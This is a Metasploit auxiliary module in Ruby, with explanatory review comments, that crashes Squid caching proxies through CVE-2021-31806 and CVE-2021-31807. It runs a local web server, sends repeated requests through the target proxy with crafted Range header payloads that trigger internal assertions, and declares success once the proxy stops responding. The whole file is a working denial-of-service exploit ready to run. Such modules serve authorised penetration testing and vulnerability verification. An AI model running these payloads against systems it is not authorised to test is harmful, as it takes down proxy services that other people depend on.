Path: blob/master/modules/auxiliary/dos/http/squid_range_dos.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Auxiliary DoS module for the Squid range-handler bugs CVE-2021-31806 /
# CVE-2021-31807 (affected versions as stated in 'Description' below).
#
# How it works, as far as this file shows: the module starts its own HTTP
# server (HttpServer mixin, `start_service`), then repeatedly sends a request
# through the target proxy whose Host header points back at that server and
# whose Range header carries one of the two payload strings defined at the
# bottom of the class. The vulnerability is reported only after the proxy
# stops answering for more than REQUEST_COUNT consecutive attempts.
#
# The 'Notes' declare CRASH_SERVICE_DOWN (the target service is expected to
# go down) and IOC_IN_LOGS (the requests are visible in the target's logs).
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HttpServer
  include Msf::Auxiliary::Dos

  # Registers module metadata and the user-settable options.
  #
  # @param info [Hash] metadata merged by `update_info`
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Squid Proxy Range Header DoS',
        'Description' => %q{
          The range handler in The Squid Caching Proxy Server 3.0-4.1.4 and
          5.0.1-5.0.5 suffers from multiple vulnerabilities triggered
          by specific HTTP requests and responses.

          These vulnerabilities allow remote attackers to cause a
          denial of service through specifically crafted requests.
        },
        'Author' => [
          'Joshua Rogers' # Discoverer, and Metasploit Module
        ],
        'License' => MSF_LICENSE,
        'Actions' => [
          ['DOS', { 'Description' => 'Perform Denial of Service Against The Target' }]
        ],
        'DefaultAction' => 'DOS',
        'References' => [
          [ 'CVE', '2021-31806'],
          [ 'CVE', '2021-31807'],
          [ 'URL', 'https://blogs.opera.com/security/2021/10/fuzzing-http-proxies-squid-part-2/']
        ],
        'DisclosureDate' => '2021-05-27',
        'Notes' => {
          'Stability' => [ CRASH_SERVICE_DOWN ],
          'Reliability' => [ ],
          'SideEffects' => [ IOC_IN_LOGS ]
        }
      )
    )

    register_options(
      [
        Opt::RPORT(3128),
        # REQUEST_COUNT is used for two things in `run`: the cap on answered
        # requests AND the number of consecutive failures needed before the
        # host is assumed dead.
        OptInt.new('REQUEST_COUNT', [ true, 'The number of requests to be sent, as well as the number of re-tries to confirm a dead host', 50 ]),
        # OptEnum restricts CVE to the two values `req` knows how to handle.
        OptEnum.new('CVE', [
          true, 'CVE to check/exploit', 'CVE-2021-31806',
          ['CVE-2021-31806', 'CVE-2021-31807']
        ]),
      ]
    )
  end

  # Handler for the module's own HTTP server; answers every request with a
  # minimal cacheable page.
  #
  # @param cli [Object] client connection passed to `send_response`
  # @param _request [Object] incoming request (unused)
  def on_request_uri(cli, _request)
    # The Last-Modified response header must be set such that Squid caches the page.
    send_response(cli, '<html></html>', { 'Last-Modified' => 'Mon, 01 Jan 2020 00:00:00 GMT' })
  end

  # Main loop: sends requests until either REQUEST_COUNT responses were
  # received (host considered not vulnerable) or more than REQUEST_COUNT
  # consecutive failures occur after at least one response (host considered
  # down; `report_vuln` is called).
  #
  # State:
  #   count       - requests that received a response (any truthy `res`)
  #   error_count - consecutive attempts without a response
  def run
    count = 0
    error_count = 0 # The amount of connection errors from the server.
    reqs = datastore['REQUEST_COUNT'] # The maximum amount of requests (with a valid response) to the server.

    print_status("Sending #{reqs} DoS requests to #{peer}")

    # Start the HTTP server the proxy will be asked to fetch from.
    start_service

    # `count` only grows when a response arrives, so failures do not consume
    # the budget; the loop is bounded by the error_count check below instead.
    while reqs > count
      begin
        res = req(datastore['CVE'])
      rescue Errno::ECONNRESET
        # Only ECONNRESET is mapped to "no response" here. Whether other
        # socket errors are already swallowed inside `send_request_raw`
        # cannot be told from this file — TODO confirm.
        res = nil
      end

      if res && (res.code == 200) && (count == 0)
        count = 1
        print_status("Sent first request to #{rhost}:#{rport}")
        # NOTE(review): this branch does not `next`, so it falls through to
        # `error_count += 1` once. Harmless, since error_count is reset to 0
        # on the next answered request, but it is easy to misread.
      elsif res
        # Any response at all (including non-200, or a first response that
        # is not 200) counts as the host still being alive.
        print_status("Sent DoS request #{count} to #{rhost}:#{rport}")
        count += 1
        error_count = 0

        next # Host could be completely dead, or just waiting for another Squid child.
      elsif count == 0
        # Never got a response: cannot distinguish "down" from "unreachable".
        print_error('Cannot connect to host.')
        return
      end

      error_count += 1
      next unless error_count > reqs # If we cannot connect after `reqs` consecutive attempts, assume the DoS was successful.

      print_good('DoS completely successful.')
      report_vuln(
        host: rhost,
        port: rport,
        name: name,
        refs: references
      )
      return
    end
    # Reached only when `reqs` requests were all answered.
    print_error('Looks like the host is not vulnerable.')
  end

  # Sends one request through the target proxy, addressed (via Host) to the
  # module's own HTTP server, with the Range payload for `cve`.
  #
  # @param cve [String] one of the two values accepted by the CVE option
  # @return whatever `send_request_raw` returns (response object or nil)
  def req(cve)
    case cve
    when 'CVE-2021-31806'
      sploit = cve_2021_31806
    when 'CVE-2021-31807'
      sploit = cve_2021_31807
    end
    # `sploit` stays nil for any other value; unreachable through the OptEnum
    # in `initialize`, but a direct caller would send an empty Range header.

    send_request_raw({
      'uri' => get_uri,
      'headers' => {
        'Host' => "#{srvhost_addr}:#{srvport}",
        'Range' => sploit,
        'Cache-Control' => 'public'
      }
    })
  end

  # Range header value for CVE-2021-31806.
  # @return [String]
  def cve_2021_31806
    # This will cause Squid to assert with "http->out.offset <= start"
    %(bytes=0-0,-0,-1)
  end

  # Range header value for CVE-2021-31807.
  # @return [String]
  def cve_2021_31807
    # This will cause Squid to assert with "!http->range_iter.debt() == !http->range_iter.currentSpec()"
    %(bytes=0-0,-4,-0)
  end

end